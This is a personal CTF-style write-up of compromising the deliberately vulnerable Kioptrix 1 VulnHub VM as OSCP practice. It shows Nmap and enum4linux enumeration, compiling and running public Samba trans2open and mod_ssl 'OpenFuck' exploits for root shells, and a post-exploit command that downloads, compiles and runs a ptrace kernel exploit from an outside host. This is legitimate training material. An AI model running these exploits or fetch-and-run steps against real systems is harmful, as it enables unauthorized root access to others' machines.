Kioptrix 1 Write-Up
To prepare for OSCP1 I’m planning to do a whole bunch of VulnHub VMs and other challenges. Doing these VMs and creating write-ups should give a good amount of practice before I start with the actual PWK1 course.
Kioptrix 1
The Kioptrix series consist of multiple beginner boot2root VMs with multiple ways to gain a root shell2.
Setup
I’m using VMware with two VMs: Kali 2017.1 and Kioptrix 1.
Scanning & Enumeration
After finding the IP of the kioptrix VM we can perform the usual Nmap scan to get a quick overview of what is running on the VM:
root@vm-kali:~# nmap -T4 -sV 172.16.45.133
Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-21 19:45 MDT
Nmap scan report for 172.16.45.133
Host is up (0.00041s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:75:C9:A5 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.10 seconds
The first thing that stood out was port 139, but the Nmap scan did not give any version number. Luckily that information was available via Enum4Linux:
root@vm-kali:~# enum4linux 172.16.45.133
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Aug 29 18:21:36 2017
--snip--
=======================================
| OS information on 172.16.45.133 |
=======================================
[+] Got OS info for 172.16.45.133 from smbclient: Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
[+] Got OS info for 172.16.45.133 from srvinfo:
KIOPTRIX Wk Sv PrQ Unx NT SNT Samba Server
platform_id : 500
os version : 4.5
server type : 0x9a03
--snip--
Exploit 1 - Samba
The first exploit3 is based on the version of Samba that was found via the Nmap & Enum4Linux scans:
root@vm-kali:~# searchsploit samba 2.2.
----------------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms/)
----------------------------------------------------------------------- ----------------------------------
--snip--
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1) | unix/remote/22468.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2) | unix/remote/22469.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3) | unix/remote/22470.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (4) | unix/remote/22471.txt
----------------------------------------------------------------------- ----------------------------------
root@vm-kali:~# cp /usr/share/exploitdb/platforms/unix/remote/22470.c .
root@vm-kali:~# gcc 22470.c -o exploit
root@vm-kali:~# ./exploit
Samba < 2.2.8 Remote Root exploit by Schizoprenic
Connect back method, Xnuxer-Labs, 2003.
Usage : ./exploit <type> <victim> <your_ip>
Targets:
0 = Linux
1 = FreeBSD/NetBSD
2 = OpenBSD 3.0 and prior
3 = OpenBSD 3.2 - non-exec stack
root@vm-kali:~# ./exploit 0 172.16.45.133 172.16.45.130
[+] Listen on port: 45295
[+] Connecting back to: [172.16.45.130:45295]
[+] Target: Linux
[+] Connected to [172.16.45.133:139]
[+] Please wait in seconds...!
[+] Yeah, I have a root ....!
------------------------------
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
id
uid=0(root) gid=0(root) groups=99(nobody)
Exploit 2 - Apache mod_ssl
After the first exploit I also noticed the mod_ssl version and thought I should also take a moment to see if there would also be an exploit available for that 4:
root@vm-kali:~# searchsploit mod_ssl 2.8
----------------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms/)
----------------------------------------------------------------------- ----------------------------------
Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow | multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Exploit | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Exploit | unix/remote/21671.c
----------------------------------------------------------------------- ----------------------------------
root@vm-kali:~# cp /usr/share/exploitdb/platforms/unix/remote/764.c .
root@vm-kali:~# gcc -o OpenFuck 764.c -lcrypto
764.c:20:25: fatal error: openssl/ssl.h: No such file or directory
^
compilation terminated.
Hmm. If I would have scanned through the exploit itself, I would have seen that some updates are required for the exploit to work5. After updating and installing some dependencies things improved. It did take a bit of trial and error to get the correct first parameter.
root@vm-kali:~# ./OpenFuck 0x6b 172.16.45.133 443 -c 45
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 45 of 45
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304-
--01:17:06-- http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c [following]
--01:17:06-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]
0K ... 100% @ 141.82 KB/s
01:17:06 (141.82 KB/s) - `ptrace-kmod.c' saved [3921/3921]
[+] Attached to 2052
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)